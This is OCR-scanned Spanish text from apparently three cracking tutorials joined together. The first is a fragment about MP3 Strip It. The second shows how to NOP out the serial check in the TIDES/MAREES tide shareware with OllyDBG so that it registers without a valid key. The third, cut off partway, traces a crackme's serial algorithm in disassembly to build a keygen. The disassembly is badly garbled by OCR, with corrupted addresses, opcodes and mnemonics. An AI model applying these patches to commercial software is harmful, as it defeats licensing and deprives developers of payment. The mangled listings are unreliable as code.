en la rutina pertinente : 


¡TFRegister.gbRegister_ItClick Pl ES 
Navigation Edit Plugins 


JA HA 


K 
-<¿4u TFRegister.obRegister_ | [00524948 
D0524949 B8BEC mov ebp, esp 
D052494B 81C44CFEFFFF add esp, $FFFFFE4C 
00524951 53 push ebx 
DOS524952 3309 xor e£cx, ecx 
DO0524954 S98D4CFEFFFF mov [ebp+$FFFFFE4C], ecx 
DO0524954 S98D5OFEFFFF mov [ebp+$FFFFFES5O], ecx 
D0524960 S898D5CFEFFFF mov [ebp+$FFFFFESC], ecx 
D0524966 S98D54FEFFFF mov [ebp+$FFFFFE54], ecx 
DO052496C S98D5SFEFFFF mov [ebp+$FFFFFE53], ecx 
DOS524972 SBDS mov ebx, eax 
DO0524974 S2DS560FFFFFF lea eax, [ebp+?FFFFFF60] 
* Reference to object TStrip_It_RPeg 
| 
1A| D052497A 8B15F4695200 mov edx, [$5269F4] y] 


A partir de aquí solo nos queda cargar el programa con el Loader del Softice y poner un BPX 524948 para que 
salte al intentar registrarnos y por descontado mucha paciencia para ir rastreando .Pero , ¿donde guarda la 
clave ? pues en el registro de Windows , exactamente en : HKEY_USERS| DEFAULT Softwarel Glacier 
Softwarel MP3_Strip_It_ Digitall REG que si borramos hacemos que vuelva a quedar sin registrar. 


Conclusión 


Bueno otro que cayó. Si quereis preguntarme algo me encontrareis aquí : (OGZRIP . Hasta pronto , un 
saludo. 


NOTA: Lo que aquí se expresa es sólo con fines educativos. El divulgar conocimientos no puede hacerme 
responsable del uso que se le quiera dar a este material. Así que disfrutalo , destripalo y finalmente , compraló 
( si puedes ). 
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Programa: TIDES 4.6 / MAREES 4.6 


Nombre/código. En la versión shareware, algunas opciones no son 


PROTECCION: : Ñ ; : 
operativas y algunos puertos no están disponibles. 
E . Calcula las mareas en una serie de puertos que se encuentran en 
Descripcion: A e A 
una base de datos, ampliable en la versión registrada. 


RA 


DOWNLOAD: http://www.navilog.com 


Herramientas: W32dasm, OLLYDBG 


CRACKER: Francisco FECHA: 03/02/2002 


INTRODUCCION 


El programa TI DES (en la versión inglesa, aunque existe una versión francesa llamada MAREES) sirve para calcular 
las mareas que se producen en un determinado lugar de costa. Como aficionado a la pesca en el mar, cuando vi el 
programa me pareció interesante, porque, como saben los aficionados, hay más posibilidades de conseguir una 
buena pesca cuando la marea está subiendo que cuando está bajando. Con este programa podemos saber, entre 
otras cosas, las horas y alturas aproximada de las pleamares y bajamares en un determinado puerto. En la versión 
registrada se pueden añadir nuevos puertos a partir de ficheros que pueden descargarse desde la página del autor. 


El problema que me encontré es que los puertos que me interesaban (de España) no aparecían en la lista de 
puertos propuestos en la versión shareware, y antes de adquirir el programa deseaba comprobar si los datos 
proporcionados por el programa coincidían, al menos de forma aproximada, con los datos de una “tabla de mareas 
que poseía. 


, 


Soy novato en esto de hacer cracks (hace unas dos semanas que he comenzado a practicar, y sólo he hecho 
algunos ejercicios sencillos), y me ha costado bastante encontrar una 'solución' al problema, aunque al final he 
encontrado una sencilla (que considero temporal, porque, aunque me ha funcionado, no me satisface totalmente, 
porque hubiera preferido un generador de códigos), que es la que describo a continuación. 


Para depurar el programa y registrar TI DES utilicé OllyDBG (no he utilizado SOFTICE porque aún no me encuentro 
cómodo con él y no deseaba volver a arrancar el ordenador). 


Verifiqué que el programa no está comprimido y, aunque comprobé que está escrito en Delphi, no utilicé DEDE 
porque aún no conozco bien este programa. 


| AL ATAKE 


Comenzamos viendo qué debemos buscar. Para ello arrancamos el programa TI DES.EXE 
(MAREES.EXE en la versión francesa) y vemos que se presenta una pantalla declinando 
responsabilidades por el uso del programa y, una vez que se acepta, se presenta una pantalla 
indicando que es una versión Shareware. En lo que sigue me referiré a la versión inglesa. 


Intentamos registrar el programa desde la opción Tools/Licence. Aquí aparece una ventana 
solicitando el nombre del usuario y un código de registro; aparece, protegido un número de usuario 
(que, según vi luego, cambia cuando se instala en otra máquina, por lo que, aparentemente, es 
Calculado en función de alguna característica del ordenador). Escribimos un nombre de usuario y una 
clave, y al aceptar nos muestra un mensaje “code unvailable' (al menos es lo que me indicó a mí 
todas las veces que probé). 


¡Comencemos con WDASM. El programa es bastante grande y tarda un rato en desensamblarlo. En 
String references' buscamos el texto que nos ha presentado y tenemos suerte, encontramos que se 
referencia en: 


:004D22AA 33C9 xor ecx, ecx 

:004D22AC 8A08 mov cl, byte ptr [eax] 

:004D22AE 41 inc ecx 

:004D22AF E8C809F3FF call 00402C7C 

:004D22B4 7517 ¡ne 004D22CD 

1:004D22B6 6A00 push 00000000 

:004D22B8 668B0D20234D00 mov cx, word ptr [004D2320] 
1:004D22BF B202 mov dl, 02 

* Possible StringData Ref from Code Obj ->"Code non valide" 


| 

1:004D22C1 B83C254D00 mov eax, 004D253C 

:004D22C6 ESA136F8FF call 0045596C 

1:004D22CB EB15 jmp 004D22FE2 

* Referenced by a (U)nconditional or (C)onditional  ump at Address: 
|:004D22B4(C) 


| 

:004D22CD 6A00 push 00000000 

:004D22CF 668B0D20234D00 mov cx, word ptr [004D2320] 
:004D22D6 B202 mov dl, 02 

* Possible StringData Ref from Code Obj ->"Code unvailable" 


[ 
:004D22D8 B854254D00 mov eax, 004D2554 
:004D22DD ES8A36F8FF call 0045596C 


Analizamos las líneas previas a la presentación del mensaje y vemos en :004D22C6 un call 0045596C, 
¡que, enseguida vemos que no puede corresponder al análisis de la validez del código (porque aparece 
también en la dirección :004D22DD, por lo que debe corresponder a la presentación del mensaje). 


Seguimos un poco más arriba y vemos que en la dirección :004D22AF se hace otra llamada a una rutina, seguido por un salto 
condicional en :004D22B4, No vale la pena mirar mucho en la rutina llamada por :004D22AF, porque, analizando el contexto, 
vemos que sólo puede servir para determinar el idioma en que presentará el mensaje de error. 


Seguimos mirando las líneas anteriores y no veo nada especialmente significativo hasta que llegamos 
a: 


* Referenced by a (U)nconditional or (C)onditional  ump at Address: 
11:004D2081(C) 


| 
:004D20AB 8D55F4 lea edx, dword ptr [ebp-0C] 


1:004D20AE 8B86F0020000 mov eax, dword ptr [esi+000002FO] 
:004D20B4 ESEBF2F5FF call 00431344 

:004D20B9 8B45F4 mov eax, dword ptr [ebp-0C] 
:004D20BC E8D36EF3FF call 00408F94 

1:004D20C1 8B158CA14E00 mov edx, dword ptr [004EA18C] 
:004D20C7 0302 add eax, dword ptr [edx] 

:004D20C9 8945F0 mov dword ptr [ebp-10], eax 
1:004D20CC DB45FO fild dword ptr [ebp-10] 

:004D20CF D83514234D00 fdiv dword ptr [004D2314] 
1:004D20D5 83C4F4 add esp, FFFFFFF4 

:004D20D8 DB3C24 fstp tbyte ptr [esp] 

1:004D20DB 9B wait 

1:004D20DC E88BO9F5FF call 00422A6C 

:004D20E1 8B158CA14E00 mov edx, dword ptr [O04EA18C] 
1:004D20E7 8902 mov dword ptr [edx], eax 

1:004D20E9 8D55F4 lea edx, dword ptr [ebp-0C] 
:004D20EC 8B86D0020000 mov eax, dword ptr [esi+000002D0] 
:004D20F2 ESADF2F5FF call 00431344 

:004D20F7 8B45F4 mov eax, dword ptr [ebp-0C] 
:004D20FA E8956EF3FF call 00408F94 

1:004D20FF 8B158CA14E00 mov edx, dword ptr [004EA18C] 
:004D2105 3B02 cmp eax, dword ptr [edx] 

:004D2107 0F8542010000 ¡ne 004D224F 

:004D210D A1BC9F4E00 mov eax, dword ptr [004E9FBC] 
:004D2112 BA18234D00 mov edx, 004D2318 

1:004D2117 33C9 xor ecx, ecx 

1:004D2119 8A08 mov cl, byte ptr [eax] 

:004D2118B 41 inc ecx 

1:004D211C ES85BOBF3FF call 00402C7C 

:004D2121 7517 ¡ne 004D213A 

:004D2123 6A00 push 00000000 

:004D2125 668B0D20234D00 mov cx, word ptr [004D2320] 
1:004D212C B202 mov dl, 02 

* Possible StringData Ref from Code Obj ->"Thanks to have register mar" 


l 

1:004D212E B82C234D00 mov eax, 004D232C 

:004D2133 E83438F8FF call 0045596C 

:004D2138 EB15 ¡mp 004D214F 

* Referenced by a (U)nconditional or (C)onditional J ump at Address: 
[[:004D2121(C) 


l 

1:004D213A 6A00 push 00000000 

:004D213C 668B0D20234D00 mov cx, word ptr [004D2320] 
1:004D2143 B202 mov dl, 02 

6 Possible StringData Ref from Code Obj ->"Merci d'avoir souscrit " 


| 

11004D2145 B888234D00 mov eax, 004D2388 

:004D214A E81D38F8FF call 0045596C 

* Referenced by a (U)nconditional or (C)onditional J ump at Address: 
11:004D2138(U) 


1:004D214F B201 mov dl, 01 

:004D2151 A100104600 mov eax, dword ptr [00461000] 
:004D2156 ESE5EFF8FF call 00461140 

1:004D215B 8945FC mov dword ptr [ebp-04], eax 


1:004D215E 33D2 xor edx, edx 

1:004D2160 55 push ebp 

1:004D2161 68C8214D00 push 004D21C8 

:004D2166 64FF32 push dword ptr fs: [edx] 

:004D2169 648922 mov dword ptr fs:[edx], esp 

1:004D216C 33C9 xor ecx, ecx 

* Possible StringData Ref from Code Obj ->"Softwaral Marees" 


l 

1:004D216E BAFC234D00 mov edx, 004D23FC 
:004D2173 8B45FC mov eax, dword ptr [ebp-04] 
1:004D2176 ESCLIFOFSFF call 0046123C 

1:004D217B 84C0 test al, al 

:004D217D 7433 je 004D21B2 

:004D217F 8D45F8 lea eax, dword ptr [ebp-08] 
:004D2182 8B151CA24E00 mov edx, dword ptr [004EA21C] 
:004D2188 E8DF1CF3FF call 00403E6C 

:004D218D 8B4DF8 mov ecx, dword ptr [ebp-08] 

* Possible StringData Ref from Code Obj ->"utilisateur" 


| 

:004D2190 BA14244D00 mov edx, 004D2414 

1:004D2195 8B45FC mov eax, dword ptr [ebp-04] 
1:004D2198 E83BF2F8FF call 004613D8 

1:004D219D 8B0D8CA14E00 mov ecx, dword ptr [004E£A18C] 
1:004D21A3 8B09 mov ecx, dword ptr [ecx] 

* Possible StringData Ref from Code Obj ->"code" 


l 

1:004D21A5 BA28244D00 mov edx, 004D2428 
1:004D21AA 8B45FC mov eax, dword ptr [ebp-04] 
:004D21AD ESCAF2F8FF call 0046147C 


¡Aquí parece que, cuando se cumplan determinadas condiciones, registra el producto y escribe en 
HKEY_CURRENT_USER Software Marees dos cadenas llamadas 'Utilisateur' y “Code'. Aunque parece absurdo, como algunos 
[programas no realizan la comprobación una vez creada la clave, intento crear las claves Utilisateur' con mi nombre y 'Code' 
[con un valor, pero al volver a arrancar el programa me encuentro aún con el mensaje de 'Unregistered”; conclusión: como era 
¡de esperar, el programa realiza la comprobación de validez de los datos escritos; no obstante, por el tiempo que ha llevado 
¡hacer esta prueba, valía la pena intentarlo. 


Vemos un CALL 00402C7C, que, aparentemente, sólo sirve para elegir el idioma de edición. Un poco 
lantes aparece J NZ 004D224F, que al mirar en la dirección apuntada indica que “Sorry, the name 
doesn't correspond to the code”, esto es, que el valor que hemos escrito no es válido para el nombre 
elegido. Sin embargo, no es éste el mensaje que hemos obtenido sino “Code unvailable', que indica 
¡que el código es el que está mal. Un poco antes está CALL 00408F94, que parece que controla la 
validez del código escrito. |ntento seguir la pista a la rutina llamada, para poder determinar el código 
¡bueno para mi nombre, pero realiza constantes saltos a otras rutinas, así que utilizo OLLYDBG, 
¡poniendo un punto de parada en 4D20FA y sigo la ejecución con F7 y F8 hasta que, después de 
bastante tiempo obtengo el mensaje de error, pero se han realizado tantos controles en diversas 
rutinas que no consigo determinar la forma exacta en que se determina el código. Veo que se hacen 
¡muchas comprobaciones en distintas rutinas (al parecer, según lo que se realiza en la dirección 
100402DA3, la clave debe ser un valor numérico, sin letras u otros caracteres, salvo +, -, Xx O X), y 
diversas operaciones con los valores de una transformación del nombre de usuario (transformado en 
¡un número, sumando los bytes de cada letra del nombre, después de haberla pasado a mayúsculas), 
iy con el número de usuario (que como he indicado al principio depende del ordenador), todo ello con 
¡constantes saltos de un sitio del programa a otro. Después de algunas horas intentando seguir la 
¡pista para intentar encontrar el algoritmo y determinar la clave que correspondía a mi nombre, 


idescarté este procedimiento, temporalmente, e intenté otra aproximación. 


¡Para esto, en OLLYDBG pruebo a poner cinco NOP's en lugar del CALL 00408F94 y veo que, en lugar 
¡de presentar el mensaje de “Code unvailable' aparece un mensaje de falta de correspondencia entre 
lel nombre y el código introducido (Sorry, The name doesn't correspond to the code. Please check the 
linformations”), al activar el salto de no coincidencia de claves JNZ 004D224F". Así hemos conseguido 
¡evitar la validación del código, aunque no hemos conseguido registrar el programa. Como el mensaje 
laparece porque se ha activado el salto ]NZ 004D224F, por falta de coincidencia entre el contenido de 
leax y el contenido de edx (claves “buena' y “mala' tras haber sido procesadas por el algoritmo sobre 
llos datos capturados), 'nopeo' con seis NOP's la instrucción. Ahora me indica que el programa está 
¡registrado y que todos las opciones quedan activadas. Verifico, con REGEDIT, el contenido del 
Iregistro y veo que ha escrito unos valores en la cadena “utilisateur' (el nombre de usuario que yo 
¡escribí en la pantalla) y en la cadena'code' (un valor generado por el sistema). A partir de este 
momento, cuando se arranca el programa no aparece el mensaje de “Shareware”, y la lista de puertos 
les más amplia que en la anterior, aunque muchos países continúan sin estar activados. 


¡En este punto veo que la causa de que los países no estén activados es que no contienen puertos en la base de datos y que 
[pueden descargarse desde la página del autor del programa. Descargo los datos de algunos de los países, que cargo en el 
[programa mediante la opción de “Agregar puertos' y se van activando los países que aparecían desactivados. Sin embargo, en 
lla página del autor no hay, por el momento, datos que se puedan descargar para España, así que tampoco me sirvió 
Idemasiado el trabajo, porque continúo sin poder ver datos de puestos de España. 


Salgo del programa y vuelvo a entrar; veo que ahora aparece como registrado el programa y que 
todo funciona con normalidad: al final hemos tenido un poco de suerte, porque el valor que ha escrito 
¡en la cadena “code' del registro es el valor 'bueno' (como han coincidido los datos procesados por el 
[algoritmo y disponemos de una clave “'buena' y otra 'mala', el programa podía haberse escrito la clave 
''mala' y entonces me hubiera indicado que el programa continúa sin registrar). 


¡Por último, analizo con un editor de bases de datos la base de datos entregada con el programa y 
¡observo que algunos de los registros están borrados y que unos pocos corresponden a puertos de 
¡España.Los recupero con un editor de bases de datos y reconstruyo los índices, y, aunque puedo 
visualizar las mareas de estos puertos, en la operación se ha perdido la información de los países. 
¡Aparentemente, al reconstruir los índices se pierde alguna información que permite distribuir los 
[puertos por países. 


La solución que he dado es temporal, porque intentaré analizar las operaciones que realiza el 
[programa para hacer un generador de claves, que me parece una solución más elegante. 


¡Observación. Aunque no es necesario dejar los 11 NOP's escritos, porque el programa funciona, 
laparentemente, sin ningún problema, puede ocurrir que deseemos registrarlo en otra computadora o 
[para otro usuario. Para que vuelvan a aparecer las opciones de registro, sería suficiente con entrar en 
¡el registro con el programa REGEDIT, en la clave que hemos indicado anteriormente, y cambiar 
¡cualquier cosa en las cadenas 'Utilisateur' o “Code'. La próxima vez que arranquemos el programa se 
¡indica que no está registrado, pero si se pone cualquier usuario y clave, registra el programa para el 
¡nuevo usuario. 


¡Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Programa: Crack-KeyGen-Me v1.0 de RAZiEL 

PROTECCION: Name / Serial, Empacado 

Objetivo: Hacer un Keygen 

Descripcion: Excelente programita, realmente te hace pensar 

Dificultad: Media. 

DOWNLOAD : Sitio Oficial del Grupo [K-FoR] 

Herramientas: OllyDBG, W32dasm, UPX v1.07, PEiDentifier v0.71 beta 

CRACKER : ByTESCRK FECHA: 07/01/2002 
INTRODUCCION 


Creo que a muchos nos ha pasado (o por lo menos no me considero el único), después de crackear 
muchos programas y realmente ver lo fácil de ALGUNAS protecciones nos aburrimos y empezamos a 
crear nuestros Crackmes o a romper los ya existentes para desaburrirnos, bueno pues aqui va uno 
de los crackmes a los cuales les he destripado las entrañas y es que he andado mero destripador de 
crackmes en estos últimos días, creo que las aplicaciones ya no me suben tanto la bilirrubina como lo 
hacen los crackmes. Bueno pues alli les va este... 


AL ATAKE 


Lo primero, ver el programa en sí, genial no podiamos esperar nada más es un Crackme y como tal solo tiene la cajita de texto del nombre y la del serial, ahora ingresamos nuestros datos falsos... 


Nombre: ByTESCRK 
Serial: 19770424 


Ahora clic en el botón que dice Validar y el mensajito de error aparece... 


El Número de Serie Introducido No Es Válido 


De acuerdo vayamos a analizarlo (esto es esencial para cada archivo que vayamos a crackear, resulta que muchas veces únicamente nos vamos al W32DASM y cargamos el programa y vale, no nos dice nada y 
decimos Ooopps! | did again!) 


Para esto usaremos el PEiDentifier vO.71 Beta, lo puedes encontrar en http: //www.exetools.com, cargamos el programa y nos dice al hacer clic en el boton de Open File y seleccionar el archivo... 


UPX 0.89.6 - 1.02 / 1.05 - 1.20 (Delphi) stub -> Markus €: Lazlo 


En otras palabras empacado con UPX, bueno nos conseguimos alguna version de UPX (no se si todas lo desempacan realmente no lo he probado, yo he usado la version 1.07 y me ha desempacado casi, lease 


bien digo CASI la mayoría de archivos empacados con UPX) 


Para desempacar el programa realmente hacemos lo siguiente, en la carpeta que tenemos el programa UPX colocamos nuestro Crackme y ejecutamos desde DOS la siguiente línea... 


Al cabo de algunos segundos nos dirá que el programa está desempacado y el pequeño programa de 95KB a pasado a ser de 213KB, ahora nos vamos a cargarlo al W32DASM (tambien pueden hacerlo con DeDe, 
ya que el programa está hecho en Delphi y creanme es mucho más fácil) buscamos en las Reference Strings por la cadena "El Número de Serie...", pues que bien, no está la cadena, pero hay algunas otras que 


UPX -d keyme.exe 


me parecen interesantes por ejemplo esta... "Serial Correcto; Buen Cracker", si hacemos doble clic sobre ella llegaremos hasta aqui... 


:0042DOA5 E846CDFEFF call 00419DF0O <= Vamos a poner un punto de ruptura aquí 
:0042DOAA 8B45DC mov eax, dword ptr [ebp-24] 


:0042DOAD 8B55E8 mov edx, dword ptr [ebp-18] 


:0042D0BO E81B68FDFF call 004038DO <= Compara el Serial 
:0042D0B5 7511 ¡ne 0042D0C8 <= Si no es correcto da error 
:0042D0B7 E8B8AFFDFF call 00408074 


* Possible StringData Ref from Code Obj ->"Serial Correcto; Buen Cracker" 


:0042DOBC B83CD24200 mov eax, 0042D23C 
:0042D0C1 E806FAFFFF call 0042CACC 
:0042D0C6 EBOA jmp 0042D0D2 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0042D0B5(C) 


* Possible StringData Ref from Code Obj ->"El N" 


:0042D0C8 B864D24200 mov eax, 0042D264 
:0042DOCD E8FAF9FFFF call 0042CACC 


Pero como la idea no es encontrar el serial si no que crear un Keygen para este pequeño programa, entonces nos vamos a analizarlo con OllyDBG, vamos a cargar el programa y tambien a nuestra victima 


<= Wow! nos aparece el serial correcto en EBP-18 


<= Aquí está la cadena que buscabamos 


(ustedes ya saben File>Open, etc.etc.), pero primero un pequeño FAQ de Olly... realmente lo necesario... 


1.- ¿Colocar un punto de Ruptura? R:/ Presionar F2 sobre la línea 
2.- ¿Tracear paso a paso? R:/ Presionar F8 de línea en línea 

3.- ¿Entrar a una llamada? R:/ Con F7 o la tecla Enter 

4.- ¿Ejecutar hasta el próximo punto de Ruptura? R:/ Con F9 

5.- ¿Buscar una direccion? R:/ Presionar Ctrl+G 


Vamos a poner un punto de ruptura en 0042CE34, presionamos Ctrl+G y escribimos la direccion, presionamos Enter y caemos en la direccion, ahora presionamos F2 y ahora F9 y se ha cargado el programa, 


ingresamos nuestros valores y clic en el botón Validar, caemos en el punto de ruptura y empezamos a analizar el código de generacion del serial, lo interesante realmente comienza aqui... 


0042CE4D 
0042CE52 
0042CE55 
0042CE58 
0042CE5F 


680AD14200 
64:FF30 

64:8920 
C745F801000000 
8D45FO 


Podemos ver la palabra clave para generar el serial... 


0042CE62 
0042CE67 
0042CE6C 
0042CE6F 
0042CE72 
0042CE78 
0042CE7D 
0042CE80 
0042CE83 
0042CE89 
0042CE8E 
0042CE92 
0042CE94 


BA20D14200 
E87067FDFF 
8D55EC 
8B45F4 
8B80E0010000 
ES73CFFEFF 
8D55DC 
8B45F4 
8B80E0010000 
E862CFFEFF 
837DDC00 
7417 

8D55D8 


MOV EDX,KEYME.0042D120 

CALL KEYME.004035DC 

LEA EDX,DWORD PTR SS:[EBP-14] 
MOV EAX,DWORD PTR SS:[EBP-C] 
MOV EAX,DWORD PTR DS:[EAX+1E0] 
CALL KEYME.00419DFO 

LEA EDX,DWORD PTR SS:[EBP-24] 
MOV EAX,DWORD PTR SS:[EBP-C] 
MOV EAX,DWORD PTR DS:[EAX+1E0] 
CALL KEYME.00419DFO 

CMP DWORD PTR SS:[EBP-24],0 

JE SHORT KEYME.0042CEAB 

LEA EDX,DWORD PTR SS:[EBP-28] 


PUSH KEYME.0042D10A 

PUSH DWORD PTR FS:[EAX] 

MOV DWORD PTR FS:[EAX],ESP 
MOV DWORD PTR SS:[EBP-8],1 
LEA EAX,DWORD PTR SS:[EBP-10] 


; ASCII 4D,"UYBIENHASDESCUBIERTOLACONSTANTEPEROTODAVIATEQUEDAPORHACERTOMANUMERITO78943789" 


0042CE97  8B45F4 MOV EAX,DWORD PTR SS:[EBP-C] 
0042CE9A 8B80F0010000 MOV EAX,DWORD PTR DS:[EAX+1FO0] 


0042CEAO0 E84BCFFEFF CALL KEYME.00419DFO 

0042CEA5 837DD800 CMP DWORD PTR SS: [EBP-28],0 

0042CEA9 750F JNZ SHORT KEYME.0042CEBA 

Si en alguna casilla no se han introducido datos da este mensaje... 

0042CEAB B8FCD14200 MOV EAX, KEYME.0042D1FC ; ASCII "Alguna de Las Casillas No Ha Sido Rellenada" 
0042CEBO E817FCFFFF CALL KEYME.0042CACC 

0042CEB5 E918020000 J MP KEYME.0042D0D2 

0042CEBA 8B45EC MOV EAX,DWORD PTR SS:[EBP-14] 
0042CEBD E8C26AFDFF CALL KEYME.00403984 

0042CEC2 EBA998FDFF CALL KEYME.00406770 

0042CEC7 8BF8 MOV EDI,EAX 

0042CEC9 85FF TEST EDI,EDI 

0042CECB 7E4F JLE SHORT KEYME.0042CF1C 


En esta parte el programa empieza buscando desde la primera letra de nuestro nombre hasta la última, si la letra no se encuentra dentro de la palabra clave el programa la elimina de una tercera palabra que 
formará compuesta por los caracteres de nuestro nombre que aparecen en la cadena clave y valga la redundancia nuestro nombre, por ejemplo las letras "k", "g" y "G" son eliminadas por que no se encuentran en 
la palabra clave. 


0042CECD BE01000000 MOV ESI,1 

0042CED2 8B45FO MOV EAX,DWORD PTR SS:[EBP-10] 
0042CED5 EBAAGAFDFF CALL KEYME.00403984 

0042CEDA E89198FDFF CALL KEYME.00406770 

0042CEDF 85C0 TEST EAX,EAX 

0042CEE1 7E35 JLE SHORT KEYME.0042CF18 
0042CEE3 BB01000000 MOV EBX,1 

0042CEE8 8B55EC MOV EDX,DWORD PTR SS:[EBP-14] 
0042CEEB 8A5432FF MOV DL,BYTE PTR DS:[EDX+ESI-1] 
0042CEEF 8B4DFO MOV ECX,DWORD PTR SS:[EBP-10] 
0042CEF2 3A5419FF CMP DL,BYTE PTR DS:[ECX+EBX-1] 
0042CEF6 751€ JNZ SHORT KEYME.0042CF14 
0042CEF8 8D45D4 LEA EAX,DWORD PTR SS:[EBP-2C] 
0042CEFB 8B55EC MOV EDX,DWORD PTR SS:[EBP-14] 
0042CEFE 8A5432FF MOV DL,BYTE PTR DS:[EDX+ESI-1] 
0042CF02 E8E167FDFF CALL KEYME.004036E8 

0042CF07 8B55D4 MOV EDX,DWORD PTR SS:[EBP-2C] 
0042CFOA 8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 
0042CFOD E8B668FDFF CALL KEYME.004037C8 

0042CF12 EBO4 JMP SHORT KEYME.0042CF18 
0042CF14 43 INC EBX 

0042CF15 48 DEC EAX 

0042CF16 DO JNZ SHORT KEYME.0042CEE8 
0042CF18 46 INC ESI 

0042CF19 AF DEC EDI 

0042CF1A B6 JNZ SHORT KEYME.0042CED2 

Aqui termina la creación de la tercera cadena... y empieza la extración de los primeros seis caracteres de la cadena 
0042CF1C 8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 
0042CF1F 8B55FO MOV EDX,DWORD PTR SS:[EBP-10] 
0042CF22 E8A168FDFF CALL KEYME.004037C8 

0042CF27 8D45EC LEA EAX,DWORD PTR SS:[EBP-14] 
0042CF2A E81566FDFF CALL KEYME.00403544 

0042CF2F BB01000000 MOV EBX, 1 

0042CF34 8D45E4 LEA EAX,DWORD PTR SS:[EBP-1C] 
0042CF37 8B55E8 MOV EDX,DWORD PTR SS:[EBP-18] 
0042CF3A 8A541AFF MOV DL,BYTE PTR DS:[EDX+EBX-1] 


0042CF3E ESA567FDFF CALL KEYME.004036E8 


0042CF43 8D45EC LEA EAX,DWORD PTR SS:[EBP-14] 


0042CF46 8B55E4 MOV EDX,DWORD PTR SS:[EBP-1C] 
0042CF49 ES7A68FDFF CALL KEYME.004037C8 

0042CF4E 43 INC EBX 

0042CF4F 83FB07 CMP EBX,7 

0042CF52 EO JNZ SHORT KEYME.0042CF34 


Ya han sido extraídos los primeros seis caracteres de la cadena y ahora el programa va a buscar de acuerdo a los seis caracteres extraídos una unión de caracteres más haciendo algunas operaciones... 
0042CF54 8B45EC MOV EAX,DWORD PTR SS:[EBP-14] 

0042CF57 E8286AFDFF CALL KEYME.00403984 

0042CF5C ESOF98FDFF CALL KEYME.00406770 


0042CF61 8BF8 MOV EDI,EAX 

0042CF63 85FF TEST EDI,EDI 

0042CF65 7E6C JLE SHORT KEYME.0042CFD3 
0042CF67 BBO01000000 MOV EBX, 1 

0042CF6C 8B45FO MOV EAX,DWORD PTR SS:[EBP-10] 


0042CF6F ES106AFDFF CALL KEYME.00403984 
0042CF74 ESF797FDFF CALL KEYME.00406770 


0042CF79 85C0 TEST EAX,EAX 

0042CF7B 7E52 JLE SHORT KEYME.0042CFCF 

0042CF7D BE01000000 MOV ESI,1 <= ESI recibe el valor 1 

0042CF82 8B55EC MOV EDX,DWORD PTR SS:[EBP-14] <= EDX recibe los seis caracteres 
0042CF85 8A541AFF MOV DL,BYTE PTR DS:[EDX+EBX-1] <= Extrae caracter por caracter 
0042CF89 8B4DFO MOV ECX,DWORD PTR SS:[EBP-10] <= ECX recibe la palabra clave 
0042CF8C 3A5431FF CMP DL,BYTE PTR DS:[ECX+ESI-1] <= Compara los caracteres 
0042CF90 7539 JNZ SHORT KEYME.0042CFCB <= Si no son iguales continua buscando 
0042CF92 8BCE MOV ECX,ESI <= ESI es el valor de la posicion en que fue hallado el caracter 
0042CF94 8BC1 MOV EAX, ECX 

0042CF96 F7E9 IMUL ECX <= EAX = EAX * ECX 

0042CF98 8BC8 MOV ECX,EAX 

0042CF9A 2BCE SUB ECX,ESI <= ECX = ECX - ESI 

0042CF9C 034DEO ADD ECX,DWORD PTR SS:[EBP-20] <= Suma el valor de EBP-20 
0042CF9F 8BC1 MOV EAX, ECX 

0042CFA1 B936000000 MOV ECX,36 

0042CFA6 99 CDQ 

0042CFA7 F7F9 IDIV ECX <= El cociente de dividir ECX dentro de EAX es almacenado en EDX 
0042CFA9 8BF2 MOV ESI,EDX <= ESI recibe el valor 

0042CFAB 46 INC ESI <= Incrementa uno 

0042CFAC 8D45D4 LEA EAX, DWORD PTR SS: [EBP-2C] 

0042CFAF 8B55FO MOV EDX,DWORD PTR SS:[EBP-10] <= EDX recibe palabra clave 


0042CFB2 8A5432FF MOV DL,BYTE PTR DS:[EDX+ESI-1] <= Extrae el caracter de la posicion que indique ESI-1 
0042CFB6 E82D67FDFF CALL KEYME.004036E8 

0042CFBB 8B55D4 MOV EDX,DWORD PTR SS:[EBP-2C] 

0042CFBE 8D45FC LEA EAX,DWORD PTR SS:[EBP-4] 

0042CFC1 E80268FDFF CALL KEYME.004037C8 


0042CFC6 8975E0 MOV DWORD PTR SS:[EBP-20],ESI 

0042CFC9 EBO4 JMP SHORT KEYME.0042CFCF 

0042CFCB 46 INC ESI 

0042CFCC 48 DEC EAX 

0042CFCD B3 JNZ SHORT KEYME.0042CF82 

0042CFCF 43 INC EBX 

0042CFDO 4F DEC EDI 

0042CFD1 99 JNZ SHORT KEYME.0042CF6C <= Si no ha terminado la cadena regresa a 0042CF6C 
0042CFD3 8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 


0042CFD6 E86965FDFF CALL KEYME.00403544 
0042CFDB BB01000000 MOV EBX, 1 


0042CFEO 83FB07 
0042CFE3 750D JNZ SHORT KEYME.0042CFF2 
0042CFE5 8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 
0042CFE8 BA30D24200 MOV EDX,KEYME.0042D230 
0042CFED E8D667FDFF CALL KEYME.004037C8 

0042CFF2 8D45D4 LEA EAX,DWORD PTR SS:[EBP-2C] 
0042CFF5 8B55FC MOV EDX,DWORD PTR SS:[EBP-4] 
0042CFF8 8A541AFF MOV DL,BYTE PTR DS:[EDX+EBX-1] 
0042CFFC ESE766FDFF CALL KEYME.004036E8 

0042D001 8B55D4 MOV EDX,DWORD PTR SS:[EBP-2C] 
0042D004 8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 
0042D007 E8BC67FDFF CALL KEYME.004037C8 

0042D00C 43 INC EBX 

0042D00D 83FB07 CMP EBX,7 

0042D010 CE JNZ SHORT KEYME.0042CFEO 
Ahora el programa extraerá letra por letra para formar un valor... 


CMP EBX,7 


<= EDX recibe la cadena formada anteriormente (Está compuesta de 6 caracteres, no debe confudirse con la primera de 6 caracteres) 


0042D012 8B45EC MOV EAX,DWORD PTR SS:[EBP-14] <= EAX recibe la primer cadena de 6 caracteres 

0042D015 E86A69FDFF CALL KEYME.00403984 

0042D01A  E85197FDFF CALL KEYME.00406770 

0042D01F 8BF8 MOV EDI,EAX 

0042D021 85FF TEST EDI,EDI 

0042D023 7E14 JLE SHORT KEYME.0042D039 

0042D025 BB01000000 MOV EBX,1 <= EBX recibe el valor de 1 

0042D02A 8B45EC MOV EAX,DWORD PTR SS:[EBP-14] <= EAX recibe el valor de la primera cadena de 6 caracteres 
